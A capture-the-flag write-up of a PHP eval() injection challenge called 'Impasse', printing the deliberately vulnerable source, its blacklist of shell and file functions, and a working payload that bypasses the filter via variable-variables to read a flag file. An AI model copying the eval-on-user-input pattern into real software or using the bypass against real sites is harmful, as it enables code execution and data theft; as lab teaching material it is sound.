Impasse

This is a PHP eval() injection challenge.

When submitting the form, the input is wrapped around an echo statement and added to the print GET parameter:

?print=echo+'<YOUR DATA>'+;

The first thing we tried was to modify the GET parameter to test for arbitrary code execution:

print=echo+'';phpinfo()

By checking the debug option, we are presented with the page's source code. The following code implements the input blacklist and the eval() vulnerability:

<?php
error_reporting(0);
if (isset($_GET['print'])) {
  if (!empty($_GET['print'])){
    $printValue= strtolower($_GET['print']);
    $blocked = array("cat", "more" ,"readfile", "fopen", "file_get_contents", "file", "SplFileObject" );
    $special_block= "nc";
    $$special_block= "../flag.txt";
    foreach ($blocked as $value) {
      if (strpos($printValue, $value) || preg_match('/\bsystem|\bexec|\bbin2hex|\bassert|\bpassthru|\bshell_exec|\bescapeshellcmd| \bescapeshellarg|\bpcntl_exec|\busort|\bpopen|\bflag\.txt|\bspecial_block|\brequire|\bscandir|\binclude|\bhex2bin|\$[a-zA-Z]|[#!%^&*_+=\-,\.:`|<>?~\\\\]/i', $printValue)) {
        $printValue="";
        echo "<script>alert('Bad character/word ditected!');</script>";
        break;
      }
    }
  eval($printValue . ";");
  } 
}
?>

Many useful functions have been blocked! But note that the eval() statement is called after the $blocked, $special_block and $$special_block variables are defined. This allows us to reference these variables in our eval-ed code.

Note that $$ has a special meaning in PHP: https://stackoverflow.com/questions/4169882/what-is-in-php

$foo = 'hello';
$hello = 'The Output';
echo $$foo; // displays "The Output"

What happens here is that the value of $foo is used as a variable name, and so $$foo becomes $hello (think of it as replacing $foo in $$foo).

$special_block= "nc";
$$special_block= "../flag.txt";

Here, the value of $special_block is used as a variable name. The second line defines a new variable, $nc, which has the value of "../flag.txt".

Our final payload is

?print=echo+'';print(eval('return ${blocked}[4](${nc});'))

which leads to the following code being eval-ed:

print(eval('return file_get_contents("../flag.txt");')

Note that $[a-zA-Z] is blocked in the regex, so we must use ${...} instead (which achieves the same purpose). Also, eval() executes file_get_contents("../flag.txt") but doesn't display anything to us yet. By returning and printing the output, we retrieve the flag.

PreviousClubmouse NextDSTA BrainHack CDDC21

Last updated 2 years ago

<?php error_reporting(0); if (isset($_GET['print'])) { if (!empty($_GET['print'])){ $printValue= strtolower($_GET['print']); $blocked = array("cat", "more" ,"readfile", "fopen", "file_get_contents", "file", "SplFileObject" ); $special_block= "nc"; $$special_block= "../flag.txt"; foreach ($blocked as $value) { if (strpos($printValue, $value) || preg_match('/\bsystem|\bexec|\bbin2hex|\bassert|\bpassthru|\bshell_exec|\bescapeshellcmd| \bescapeshellarg|\bpcntl_exec|\busort|\bpopen|\bflag\.txt|\bspecial_block|\brequire|\bscandir|\binclude|\bhex2bin|\$[a-zA-Z]|[#!%^&*_+=\-,\.:`|<>?~\\\\]/i', $printValue)) { $printValue=""; echo "<script>alert('Bad character/word ditected!');</script>"; break; } } eval($printValue . ";"); } } ?>